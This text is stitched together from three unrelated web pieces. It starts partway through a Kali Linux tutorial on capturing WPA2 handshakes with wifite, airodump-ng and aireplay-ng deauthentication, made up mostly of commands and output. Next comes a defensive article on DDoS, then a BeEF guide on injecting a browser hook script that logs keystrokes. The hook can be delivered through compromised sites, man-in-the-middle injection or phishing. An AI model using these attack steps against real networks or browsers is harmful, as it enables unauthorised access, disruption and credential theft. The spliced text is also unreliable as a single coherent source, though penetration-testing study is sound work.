root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn’t working. So time to bring my external card to the scene.

root@kali:~# wifite
.;’                     `;,
.;’  ,;’             `;,  `;,   WiFite v2 (r85)
.;’  ,;’  ,;’     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
‘:.  ‘:.  ‘:. /_ ,:’  ,:’  ,:’
‘:.  ‘:.    /___    ,:’  ,:’   designed for Linux
‘:.       /_____      ,:’

[+] scanning for wireless devices…
[+] available wireless devices:
1. wlan1        Ralink RT2870/3070    rt2800usb – [phy1]
2. wlan0        Atheros     ath9k – [phy0]
[+] select number of device to put into monitor mode (1-2):

See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
— ——————–  —  —-  —–  —-  ——
1  me                     1  WPA2  44db   wps   client
2  *                       11  WEP   16db    no   client
3  *                         11  WEP   16db    no

[+] select target numbers (1-3) separated by commas, or ‘all’:
Now I attack the target. This time, finally, I captured a handshake.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:07:23] listening for handshake…
[0:00:57] handshake captured! saved as “hs/me_02-73-8D-**-**-**.cap”
[+] 2 attacks completed:
[+] 1/2 WPA attacks succeeded
me (02:73:8D:37:A7:ED) handshake captured
saved as hs/me_02-73-8D-**-**-**.cap

[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict <file> command-line argument
[+] disabling monitor mode on mon0… done
[+] quitting

As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every 10 secs is defualt). The no dictionary error shouldn’t bother you. We’ll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let’s see how to do the same thing with airodump-ng. This time I won’t show you the problems you might run into. It’ll be a perfect ride, all the problems were seen in wifite case.

Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I’ll end this pretty quick, as the wifite thing was quite detailed. I’m copying stuff from where I already discussed airodump-ng. (If you are not a newbie, skip to the point where you see red text)

1. Find out the name of your wireless adapter.

Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-
  • lo – loopback. Not important currently.
  • eth – ethernet
  • wlan – This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

Trouble with the wlan interface not showing up. This is because virtual machines can’t use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type

airmon-ng start wlan0

 Your mon0 interface will be created.

3. Start capturing packets

Now, we’ll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You’ll see the name of the wifi you want to hack.

airodump-ng mon0


4. Store the captured packets in a file

This can be achieved by giving some more parameters with the airodump command

airodump-ng mon0 –write name_of_file

Non newbies-
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

 Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng

 root@kali:~# aireplay-ng –deauth 0 -a BSSID here mon0

The –deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to another, or problem with beacon frame, then fix mon0 on a channel using-
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add –ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It’s a bug with aircrack-ng suite). 

Now when you look at the airodump-ng screen, you’ll see that at the top right it says WPA handshake captured . Here is what it looks like

 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

*                     *                            0    0e- 1    742       82  me
*                       *                           -35  0e- 1      0   26

You can confirm it by typing the following

root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
#  BSSID              ESSID                     Encryption
1  **************  me                        WPA (1 handshake)
2  **                          Unknown


The last thing an administrator wants to deal with is a Distributed Denial of Service (DDoS) attack. Yet, together with the recent rise of hacktism,  DDoS attacks are increasingly becoming a threat that IT admins need to prepared for.

Just recently, the CIA’s main website was allegedly brought down by a DDoS attack launched by Anonymous. DDoS attacks work by essentially leveraging the power of hijacked computer systems (through the use of botnets, for example) to send a huge amount of traffic to a single designated target. This simple concept can be frighteningly effective in bringing down huge sites.

The worst thing about DDoS attacks is that they do not prey on the victim’s weaknesses; therefore being cautious and using the right tools and protection, as in the case of hacking attacks, is not enough.

Despite the threat, there’s still an effective way to protect your network against these attacks – network design decisions. A DDoS is nothing more than a never-ending stream of requests from a large number of sources. The only way to protect against this is by having a system to identify the DDoS source and block it.

This is easier said than done. Identifying the source of a DDoS attack can be tricky and, in most cases, involves tweaking an intrusion detection system (IDS) to differentiate between legitimate requests and attacks. Testing its effectiveness is not easy either. In any case, this will cause quite a few false positives.

Once an attack source is identified, all you need to do is configure the Firewall to block that source until the attack stops. Even so, if your Internet bandwidth is overwhelmed by requests, your site will still probably be inaccessible.

And it doesn’t end here; if you’re the target of a DDoS attack, the next problem to deal with is your Internet Service Provider (ISP). If the attack is large enough, the ISP may opt to cut your route out of the system to save bandwidth and avoid degrading performance for other customers. In this case, the consequences may be worse than the actual impact of the DDoS attack itself as your downtime is likely to be longer. For this reason, you may want to check what your ISP polices on DDoS attacks are before signing up for the service.

Ironically, the ISP also happens to be your best ally in the event of a DDoS attack since their infrastructure is most likely to have the capability to handle the huge amount of traffic if the Firewall is hosted on their systems rather than at your end. This is also something you might want to explore with the ISP.

Defending against a DDoS attack is possible mostly through design choices, and having an infrastructure in place that can help mitigate the damage should you be the target of a DDoS attack.


BeEF, the Browser Exploitation Framework, is a testing tool designed to enable penetration testers to launch client-side attacks against target browsers. By using techniques similar to common drive-by malware, testers can assess the security of a target’s internal environment, bypassing the hardened perimeter.

In this post, I’ll show you the quickest way to get up and running with BeEF using BackTrack or Kali Linux. Then we’ll explore the basic structure of the program. By the end of the post you should be able to begin using BeEF in your own testing.

In this guide I’ll be using Kali Linux, the penetration testing distribution created by the folks at Offensive Security. You can download an ISO or a VMWare image The steps will also work for BackTrack, the previous incarnation of the distribution. For installation steps on other systems, check out the BeEF Wiki.

Installation on Kali is very simple. Since they’ve created a nice package we can simply use apt-get to install it. Just to make sure we’ve got the most recent version, we’ll update our package list first.

root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss

(Be sure you get beef-xss and not beef. The latter is a programming language interpreter.)

Since we’re depending on a package from the Kali maintainers, this method may not always get the most up-to-date version of BeEF. At the time of this post the package provides version which is the most recent release. If you need a feature that isn’t yet available in the Kali package then you’ll need to follow the directions on the BeEF website to download & install it manually.

Once the install is finished, we can change to its directory and launch BeEF:

root@kali:/# cd /usr/share/beef-xss
root@kali:/# ./beef

You should see the following:This screen tells us that BeEF is running on two different interfaces, locally and internally, both on port 3000. It also provides the link for the “hook” and the user interface control panel. All of these settings and more are customizable via the “config.yaml” file found in the program’s root directory.Now that BeEF is up and running, let’s check out the control panel.  Using a web browser we’ll browse to the link listed above. In my case it’s You should be able to access this link from any machine on the same local network, but if you have a host-based firewall turned on you may need to open the appropriate ports to access it. The user name and password are beef:beef.

Once logged in we’re greeted with a helpful Getting Started page that explains some of the additional options. But the most important point is in the first paragraph. Here we learn how to “hook” a browser. BeEF provides two example pages in order to test with.

The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run on client browsers. When it does, it calls back to the BeEF server communicating a lot of information about the target. It also allows additional commands and modules to be ran against the target.  In this example, the location of my BeEF hook is at

In order to attack a browser, we need to include our JavaScript hook in a page that the client will view. There are a number of ways to do that, but the easiest is to insert the following into a page and somehow get the client to open it.

<script src=”; type=”text/javascript”></script>

In a real-world test, you could insert this link in a page via a compromised web server, inject it into traffic after a successful man-in-the-middle attack, or use social engineering techniques such as phone calls, emails, or social network links to get the target to visit the page.

For this demonstration, click the link beside “basic demo page here.” Once that page loads, go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see your IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.

When you click on any machine on the left, you’ll see a lot more details and functionality. The screenshot below shows the Logs tab on the right. We can see that I typed “secret password” into the text box on the demo page. Notice that I didn’t submit the page, I just typed it in.

As an experiment, try clicking anywhere else on the demo page except for in the text box. Now type something like “abcdef.” Now go back to the BeEF Control Panel and click the Refresh button at the bottom of the Logs tab. You should notice a new event similar to this:

Now click on the Commands tab. You’ll find a wide range of commands and exploits that can be launched against your target. Try them out, but be patient; sometimes it takes awhile for commands to finish and report their results. The more you experiment with each command, the more you’ll know how reliable it is and how best to use it. In addition to the exploits listed, BeEF can also be integrated with Metasploit in order to launch a wider range of exploits against the host system. That’ll be another blog post.

Notice that some of the commands have different colored icons. If you click back to the Getting Started tab, there’s an explanation of what each of the colors represent.

Now that you’re up and running there’s a lot more that you can do with BeEF. Experiment with the different options in your lab so that you’ll be ready to go when the opportunity presents itself during an engagement.